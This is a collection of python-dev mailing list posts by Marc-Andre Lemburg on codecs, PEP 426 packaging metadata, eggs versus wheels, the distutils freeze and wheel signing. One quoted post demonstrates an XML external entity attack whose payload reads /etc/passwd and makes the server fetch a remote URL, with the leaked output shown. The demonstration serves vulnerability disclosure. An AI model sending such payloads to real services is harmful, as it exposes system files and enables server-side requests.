Re: [Python-Dev] Why can't I encode/decode base64 without importing a module?
On 23.04.2013 17:47, Guido van Rossum wrote: On Tue, Apr 23, 2013 at 8:22 AM, M.-A. Lemburg m...@egenix.com wrote: Just as reminder: we have the general purpose encode()/decode() functions in the codecs module: import codecs r13 = codecs.encode('hello world', 'rot-13') These interface directly to the codec interfaces, without enforcing type restrictions. The codec defines the supported input and output types. As an implementation mechanism I see nothing wrong with this. I hope the codecs module lets you introspect the input and output types of a codec given by name? At the moment there is no standard interface to access supported input and output types... but then: regular Python functions or methods also don't provide such functionality, so no surprise there ;-) It's mostly a matter of specifying the supported type combinations in the codec documentation. BTW: What would be a use case where you'd want to programmatically access such information before calling the codec ? -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 23 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2013-04-17: Released eGenix mx Base 3.2.6 ... http://egenix.com/go43 : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python
Reminds me of the encoding attacks that were possible in earlier versions of Python... you could have e.g. an email processing script run the Python test suite by simply sending a specially crafted email :-) On 21.02.2013 13:04, Christian Heimes wrote: Am 21.02.2013 11:32, schrieb Antoine Pitrou: You haven't proved that these were actual threats, nor how they actually worked. I'm gonna remain skeptical if there isn't anything more precise than It highly depends on the parser and the application what kind of exploit is possible. https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default $ ./python-external.py REQUEST: weatherAachen/weather RESPONSE: - weatherThe weather in Aachen is terrible./weather REQUEST: ?xml version=1.0 encoding=utf-8? !DOCTYPE weather [ !ENTITY passwd SYSTEM file:///etc/passwd ] weatherpasswd;/weather RESPONSE: - errorUnknown city root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bi/error REQUEST: ?xml version=1.0 encoding=utf-8? !DOCTYPE weather [ !ENTITY url SYSTEM http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem; ] weatherurl;/weather RESPONSE: - errorUnknown city -BEGIN DH PARAMETERS- MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC -END DH PARAMETERS- These are the 512 bit DH parameters from Assigned Number for SKIP Protocols (http://www.skip-vpn.org/spec/numbers.html). See there for how they were generated. Note that g is not a generator, but this is not a problem since p is a safe prime. /error Q.E.D. Christian ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/mal%40egenix.com -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 24 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 20.02.2013 03:37, Paul Moore wrote: On 20 February 2013 00:54, Fred Drake f...@fdrake.net wrote: I'd posit that anything successful will no longer need to be added to the standard library, to boot. Packaging hasn't done well there. distlib may be the exception, though. Packaging tools are somewhat unique because of the chicken and egg issue involved in having a packaging tool with external dependencies - who installs your dependencies for you? So enabling technology (library code to perform packaging-related tasks, particularly in support of standardised formats) could be better available from the stdlib. I'd rather see a successful packaging story develop than bundle it into the standard library. The later just isn't that interesting any more. Bundling too early is a bad idea though. distlib is developing fast and to do so it needs (1) a development cycle independent of python's and (2) compatibility and ease of use with earlier versions of Python (the latter is also critical for adoption in place of custom code in packaging tools). Aiming for an accelerated level of development targeting inclusion in Python 3.4 is plausible, though. MAL pointed out that agreeing standards but not offering tools to support them in the stdlib is risky, as people have no incentive to adopt those standards. We've got 6 months or more until 3.4 feature freeze, let's not make any decision too soon, though. I'm fine with not adding distlib to Python 3.4. The point I wanted to make was that there has to be an reference implementation of the PEP that tool makers can use to avoid reinventing the wheel over and over again (each with its own set of problems). If distlib implements the PEP, then it just needs to be mentioned there as a suitable reference implementation. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 20 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 20.02.2013 00:16, Daniel Holth wrote: On Tue, Feb 19, 2013 at 5:10 PM, M.-A. Lemburg m...@egenix.com wrote: On 19.02.2013 23:01, Daniel Holth wrote: On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote: On 19.02.2013 14:40, Nick Coghlan wrote: On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote: * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO). Other tools involved in Python distribution may also use this format. The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions. Oh, come on, Nick, that's just silly. setuptools was included in stdlib for a short while, so the above is simply wrong. Eggs are the most widely used binary distribution format for Python package on PyPI: # wc *files.csv 25585 25598 1431013 2013-02-19-egg-files.csv 46194640 236694 2013-02-19-exe-files.csv 254 255 13402 2013-02-19-msi-files.csv 104691 104853 5251962 2013-02-19-tar-gz-files.csv 24 241221 2013-02-19-whl-files.csv 17937 18022 905913 2013-02-19-zip-files.csv 153110 153392 7840205 total (based on todays PyPI stats) It doesn't really help ignoring realities... and I'm saying that as one of the core devs who got setuptools kicked out of the stdlib again. -- Marc-Andre Lemburg eGenix.com The wheel philosophy is that it should be supported by both python-dev and setuptools and that you should feel happy about using setuptools if you like it whether or not python-dev (currently) endorses that. If you are using setuptools (distribute's pkg_resources) then you can use both at the same time. Distribute, distutils and setuptools' problems have not been well understood which I think is why there has been a need to discredit setuptools by calling it non-standard. It is the defacto standard. If your packages have dependencies there is no other choice. Wheel tries to solve the real problem by allowing you to build a package with setuptools while giving the end-user the choice of installing setuptools or not. Of course eggs are the most popular right now. The wheel format is very egg-like while avoiding some of egg's problems. See the comparison in the PEP or read the story on wheel's rtfd. The wheel project includes tools to losslessly convert eggs or bdist_wininst to wheel. That's all fine, but it doesn't explain the refusal to add the documentation of the location of the PKG-INFO file in eggs ? It would just be a sentence, I wouldn't have a problem with it but I also don't see why it would be necessary. Even setuptools doesn't touch the file usually. Right now distribute's pkg_resources currently only understands Requires-Dist if it is inside a .dist-info directory. Perhaps I'm not clear enough. I'll try again :-) The wording in the PEP alienates the egg format by defining an incompatible new standard for the location of the metadata file: There are three standard locations for these metadata files: * the PKG-INFO file included in the base directory of Python source distribution archives (as created by the distutils sdist command) * the {distribution}-{version}.dist-info/METADATA file in a wheel binary distribution archive (as described in PEP 425, or a later version of that specification) * the {distribution}-{version}.dist-info/METADATA files in a local Python installation database (as described in PEP 376, or a later version of that specification) It's easy to upgrade distribute and distutils to write metadata 1.2 format, simply by changing the version in the PKG-INFO files. These addition are necessary to fix the above and also include the standard location of the metadata for pip and distutils installations: * the EGG-INFO/PKG-INFO file in an egg binary distribution archive (as created by the distribute bdist_egg command) * the {distribution}-{version}.egg/EGG-INFO/PKG-INFO file in an installed egg distribution archive * the {distribution}-{version}.egg-info/PKG-INFO file for packages installed with pip install or distribute's python setup.py install * the {distribution}-{version}.egg-info file for packages installed with distutils' python setup.py install -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 20 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 17.02.2013 11:11, Nick Coghlan wrote: FYI -- Forwarded message -- From: Nick Coghlan ncogh...@gmail.com Date: Sun, Feb 17, 2013 at 8:10 PM Subject: PEP 426 is now the draft spec for distribution metadata 2.0 To: DistUtils mailing list\\ distutils-...@python.org The latest draft of PEP 426 is up at http://www.python.org/dev/peps/pep-0426/ Major changes since the last draft: 1. Metadata-Version is 2.0 rather than 1.3, and the field now has the same major.minor semantics as are defined for wheel versions in PEP 427 (i.e. if a tool sees a major version number it doesn't recognise, it should give up rather than trying to guess what to do with it, while it's OK to process a higher minor version) 2. The Private-Version field is added, and several examples are given showing how to use it in conjunction with translated public versions when a project wants to use a version numbering scheme that the standard installation tools won't understand. 3. The environment markers section more clearly covers the need to handle parentheses (this was mentioned in the text, but not the pseudo-grammar), and the fields which support those markers have an explicit cross-reference to that section of the spec. 4. Leading/trailing whitespace and date based versioning are explicitly excluded from valid public versions 5. Version compatibility statistics are provided for this PEP relative to PEP 386 (the analysis script has been added to the PEP repo if anyone wants to check my numbers) 6. I have reclaimed BDFL-Delegate status (with Guido's approval) Since getting wheel support into pip no longer depends on this version of the metadata spec, I plan to leave it open for comment for another week, and then accept it next weekend if I don't hear any significant objections. Overall, I think the meta data for Python packages is getting too complicated. Without a support module in the stdlib implementing the required parsing, evaluation and formatting mechanisms needed to analyze and write the format, I'm -1 on adding yet another format version on top of the stack. At the moment, discussing yet another version update is mostly academic, since not even version 1.2 has been picked up by the tools yet: distutils still writes version 1.1 meta data and doesn't even understand 1.2 meta data. The only tool in wide spread use that understands part of the 1.2 data is setuptools/distribute, but it can only understand the Requires-Dist field of that version of the spec (only because the 1.1 Requires field was deprecated) and interprets a Provides-Extra field which isn't even standard. All other 1.2 fields are ignored. setuptools/distribute still writes 1.1 meta-data. I've never seen environment markers being used or supported in the wild. I'm not against modernizing the format, but given that version 1.2 has been out for around 8 years now, without much following, I think we need to make the implementation bit a requirement before accepting the PEP. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 19 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 11:28, Nick Coghlan wrote: On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote: On 17.02.2013 11:11, Nick Coghlan wrote: I'm not against modernizing the format, but given that version 1.2 has been out for around 8 years now, without much following, I think we need to make the implementation bit a requirement before accepting the PEP. It is being implemented in distlib, and the (short!) appendix to the PEP itself shows how to read the format using the standard library's email module. Hmm, what is distlib and where does it live ? The PEP only shows how to parse the RFC822-style format used by the metadata. That's not what I was referring to. If a tools wants to support metadata 2.0, it has to support all the complicated stuff as well, i.e. handle the requires fields, the environment markers and version comparisons/sorting. v2.0 is designed to fix many of the issues that prevented the adoption of v1.2, including tweaks to the standardised version scheme and the addition of a formal extension mechanism to avoid the ad hoc extensions that occurred with earlier metadata versions. Some more notes: * I find it confusing that we now have two version schemes, one defined in PEP 426 (hidden in the middle of the document) and one in PEP 386. It would be better to amend or replace PEP 386, since that's where you look for Python version strings. * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO). Not sure whether related or not, I also think it would be a good idea to make the metadata file available on PyPI for download (could be sent there when registering the package release). The register command only posts the data as 1.0 metadata, but includes fields from metadata 1.1. PyPI itself only displays part of the data. It would be useful to have the metadata readily available for inspection on PyPI without having to download one of the distribution files first. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 19 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 14:40, Nick Coghlan wrote: On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote: * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO). Other tools involved in Python distribution may also use this format. The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions. Oh, come on, Nick, that's just silly. setuptools was included in stdlib for a short while, so the above is simply wrong. Eggs are the most widely used binary distribution format for Python package on PyPI: # wc *files.csv 25585 25598 1431013 2013-02-19-egg-files.csv 46194640 236694 2013-02-19-exe-files.csv 254 255 13402 2013-02-19-msi-files.csv 104691 104853 5251962 2013-02-19-tar-gz-files.csv 24 241221 2013-02-19-whl-files.csv 17937 18022 905913 2013-02-19-zip-files.csv 153110 153392 7840205 total (based on todays PyPI stats) It doesn't really help ignoring realities... and I'm saying that as one of the core devs who got setuptools kicked out of the stdlib again. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 19 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 14:40, Nick Coghlan wrote: On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote: On 19.02.2013 11:28, Nick Coghlan wrote: On Tue, Feb 19, 2013 at 7:37 PM, M.-A. Lemburg m...@egenix.com wrote: On 17.02.2013 11:11, Nick Coghlan wrote: I'm not against modernizing the format, but given that version 1.2 has been out for around 8 years now, without much following, I think we need to make the implementation bit a requirement before accepting the PEP. It is being implemented in distlib, and the (short!) appendix to the PEP itself shows how to read the format using the standard library's email module. Hmm, what is distlib and where does it live ? As part of the post-mortem of packaging's removal from Python 3.3, several subcomponents were identified as stable and useful. distlib is those subcomponents extracted into a separate repository by Vinay Sajip. It will be proposed as the standard library infrastructure for building packaging related tools, while distutils will become purely a build system and have nothing to do with installing software directly (except perhaps on developer machines). Shouldn't those details be mentioned in the PEP ? The PEP only shows how to parse the RFC822-style format used by the metadata. That's not what I was referring to. If a tools wants to support metadata 2.0, it has to support all the complicated stuff as well, i.e. handle the requires fields, the environment markers and version comparisons/sorting. Which is what distutils2 can be used for now, and what distlib will provide without the unwanted build system infrastructure in distutils2. v2.0 is designed to fix many of the issues that prevented the adoption of v1.2, including tweaks to the standardised version scheme and the addition of a formal extension mechanism to avoid the ad hoc extensions that occurred with earlier metadata versions. Some more notes: * I find it confusing that we now have two version schemes, one defined in PEP 426 (hidden in the middle of the document) and one in PEP 386. It would be better to amend or replace PEP 386, since that's where you look for Python version strings. You can't understand version specifiers without understanding the sort order defined for the version scheme, so documenting them separately is just a recipe for confusion. PEP 386 defines both. The point here is that the version scheme goes far beyond the metadata format and is complicated enough to warrant a separate PEP. I plan to mark PEP 386 as Withdrawn when I accept this PEP, as the sorting scheme it defines is broken, and the distutils changes proposed in that PEP are never going to happen. Hmm, Tarek is the author, so only he can withdraw the PEP, AFAIK. * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO). Other tools involved in Python distribution may also use this format. The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions. See my other reply. Not sure whether related or not, I also think it would be a good idea to make the metadata file available on PyPI for download (could be sent there when registering the package release). The register command only posts the data as 1.0 metadata, but includes fields from metadata 1.1. PyPI itself only displays part of the data. It's not related, but I plan to propose the adoption of TUF (with GPG based signatures) for PyPI's end-to-end security solution, and the conversion of the metadata files to JSON for distribution through TUF's metadata support. (Donald Stufft already wrote PEP 426 - JSON bidirectional converter as part of an unrelated experiment) Why convert the metadata format you are defining in PEP 426 to yet another format when it can be uploaded as file straight to PyPI ? TUF doesn't have anything to do with that, agreed ;-) It would be useful to have the metadata readily available for inspection on PyPI without having to download one of the distribution files first. Indeed, which is a large part of why TUF (aka The Update Framework: https://www.updateframework.com/) is such an interesting security solution. The suggestion to have the metadata available on PyPI doesn't have anything to do with security. It's about being able to determine compatibility and select the right distribution file for download. The metadata also helps in creating dependency graphs, which are useful for a lot of things. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 19 2013) Python Projects, Consulting
Re: [Python-Dev] Fwd: PEP 426 is now the draft spec for distribution metadata 2.0
On 19.02.2013 23:01, Daniel Holth wrote: On Tue, Feb 19, 2013 at 4:34 PM, M.-A. Lemburg m...@egenix.com wrote: On 19.02.2013 14:40, Nick Coghlan wrote: On Tue, Feb 19, 2013 at 11:23 PM, M.-A. Lemburg m...@egenix.com wrote: * PEP 426 doesn't include any mention of the egg distribution format, even though it's the most popular distribution format at the moment. It should at least include the location of the metadata file in eggs (EGG-INFO/PKG-INFO) and egg installations (eggdir/EGG-INFO/PKG-INFO). Other tools involved in Python distribution may also use this format. The egg format has never been, and never will be, officially endorsed by python-dev. The wheel format is the standard format for binary distribution, and PEP 376 defines the standard location for metadata on installed distributions. Oh, come on, Nick, that's just silly. setuptools was included in stdlib for a short while, so the above is simply wrong. Eggs are the most widely used binary distribution format for Python package on PyPI: # wc *files.csv 25585 25598 1431013 2013-02-19-egg-files.csv 46194640 236694 2013-02-19-exe-files.csv 254 255 13402 2013-02-19-msi-files.csv 104691 104853 5251962 2013-02-19-tar-gz-files.csv 24 241221 2013-02-19-whl-files.csv 17937 18022 905913 2013-02-19-zip-files.csv 153110 153392 7840205 total (based on todays PyPI stats) It doesn't really help ignoring realities... and I'm saying that as one of the core devs who got setuptools kicked out of the stdlib again. -- Marc-Andre Lemburg eGenix.com The wheel philosophy is that it should be supported by both python-dev and setuptools and that you should feel happy about using setuptools if you like it whether or not python-dev (currently) endorses that. If you are using setuptools (distribute's pkg_resources) then you can use both at the same time. Distribute, distutils and setuptools' problems have not been well understood which I think is why there has been a need to discredit setuptools by calling it non-standard. It is the defacto standard. If your packages have dependencies there is no other choice. Wheel tries to solve the real problem by allowing you to build a package with setuptools while giving the end-user the choice of installing setuptools or not. Of course eggs are the most popular right now. The wheel format is very egg-like while avoiding some of egg's problems. See the comparison in the PEP or read the story on wheel's rtfd. The wheel project includes tools to losslessly convert eggs or bdist_wininst to wheel. That's all fine, but it doesn't explain the refusal to add the documentation of the location of the PKG-INFO file in eggs ? I am confident distlib can thrive outside of the standard library! Why the rush to kill it before its prime? Who's trying to kill distlib ? -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 19 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] BDFL delegation for PEP 426 + distutils freeze
On 03.02.2013 19:33, Éric Araujo wrote: I vote for removing the distutils is frozen principle. I’ve also been thinking about that. There have been two exceptions to the freeze, for ABI flags in extension module names and for pycache directories. When the stable ABI was added and MvL wanted to change distutils (I don’t know to do what exactly), Tarek stood firm on the freeze and asked for any improvement to go into distutils2, and after MvL said that he would not contibute to an outside project, we merged d2 into the stdlib. Namespace packages did not impact distutils either. Now that we’ve removed packaging from the stdlib, we have two Python features that are not supported in the standard packaging system, and I agree that it is a bad thing for our users. I’d like to propose a reformulation of the freeze: - refactorings for the sake of cleanup are still shunned - fixes to really old bugs that have become the expected behavior are still avoided - fixes to follow OS changes are still allowed (we’ve had a number for Debian multiarch, Apple moving stuff around, Windows manifest options changes) - support for Python evolutions that involve totally new code, commands or setup parameters are now possible (this enables stable API support as well as a new bdist format) - behavior changes to track Python behavior changes are now possible (this enables recognizing namespace packages, unless we decide they need a new setup parameter) We’ll probably need to talk this over at PyCon (FYI I won’t be at the language summit but I’ll take part in the packaging mini-summit planned thanks to Nick). +1 on lifting the freeze from me. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 04 2013) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] [Python-checkins] Cron docs@dinsdale /home/docs/build-devguide
On 22.12.2012 21:36, Terry Reedy wrote: On 12/22/2012 1:30 PM, Cron Daemon wrote: abort: error: Connection timed out ___ Python-checkins mailing list python-check...@python.org http://mail.python.org/mailman/listinfo/python-checkins As a volunteer checkin-list admin, I occasionally get messages like this: ''' As list administrator, your authorization is requested for the following mailing list posting: List:python-check...@python.org From:r...@python.org Subject: Cron docs@dinsdale /home/docs/build-devguide Reason: Message has implicit destination At your convenience, visit: http://mail.python.org/mailman/admindb/python-checkins to approve or deny the request. ''' I always reject the requests as I don't believe these messages belong here. I even asked, some months ago, on pydev who was responsible for the robot that sends these but got no answer. Today, apparently, another list admin decided on the opposite response and gave r...@python.org blanket permission to flood this list with irrelavancy. It it not my responsibility and I have no idea how to fix it. You can add a sender filter to have the messages automatically discarded. While people with push priviliges are supposed to subscribe to this list, I know there is at least one who unsubscribed because of the volume. This will only encourage more to leave, so I hope someone can stop it. I think such messages should go to a sys admin list. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 22 2012) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-12-14: Released mxODBC.Connect 2.0.2 ... http://egenix.com/go38 2013-01-22: Python Meeting Duesseldorf ... 31 days to go : Try our mxODBC.Connect Python Database Interface for free ! :: eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] [Catalog-sig] accept the wheel PEPs 425, 426, 427
On 13.11.2012 10:51, Martin v. Löwis wrote: Am 13.11.12 03:04, schrieb Nick Coghlan: On Mon, Oct 29, 2012 at 4:47 AM, Daniel Holth dho...@gmail.com mailto:dho...@gmail.com wrote: I think Metadata 1.3 is done. Who would like to czar? (Apologies for the belated reply, it's been a busy few weeks) I'm happy to be BDFL delegate for these. I'd like to see PEP 425 updated with some additional rationale based on Ronald's comments later in this thread, though. For the record, I'm still -1 on PEP 427, because of the signature issues. The FAQ in the PEP is incorrect in claiming PGP or X.509 cannot readily be used to verify the integrity of an archive - the whole point of these technologies is to do exactly that. The FAQ is entirely silent on why it is not using a more standard signature algorithm such as ECDSA. It explains why it uses Ed25519, but ignores that the very same rationale would apply to ECDSA as well; plus that would be one of the standard JWS algorithms. In addition, the FAQ claims that the format is designed to introduce cryptopgraphy that is actually used, yet leaves the issue of key distribution alone (except that pointing out that you can put them into requires.txt - a file that doesn't seem to be specified anywhere). I agree with Martin. If the point is to to protect against cryptography that is not used, then not using the de-facto standard in signing open source distribution files, which today is PGP/GPG, misses that point :-) Note that signing such distribution files can be handled outside of the wheel format PEP. It just way to complex and out of scope for the wheel format itself. Also note that PGP/GPG and the other signing tools work well on any distribution file. There's really no need to build these into the format itself. It's a good idea to check integrity, but that can be done using hashes. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Nov 13 2012) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 25.10.2012 08:42, Nick Coghlan wrote: Why are any of these codecs here in unicodeobjectland in the first place? Sure, they're needed so that Python can find its own stuff, but in principle *any* codec could be needed. Is it just an heuristic that the codecs needed for 99% of the world are here, and other codecs live in separate modules? I believe it's a combination of history and whether or not they're needed by the interpreter during the bootstrapping process before the encodings namespace is importable. They are in unicodeobject.c so that the compilers can inline the code in the various other places where they are used in the Unicode implementation directly as necessary and because the codecs use a lot of functions from the Unicode API (obviously), so the other direction of inlining (Unicode API in codecs) is needed as well. BTW: When discussing compiler optimizations, please remember that there are more compilers out there than just GCC and also the fact that not everyone is using the latest and greatest version of it. Link time inlining will usually not be as efficient as compile time optimization and we need every bit of performance we can get for Unicode in Python 3. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 25 2012) Python Projects, Consulting and Support ... 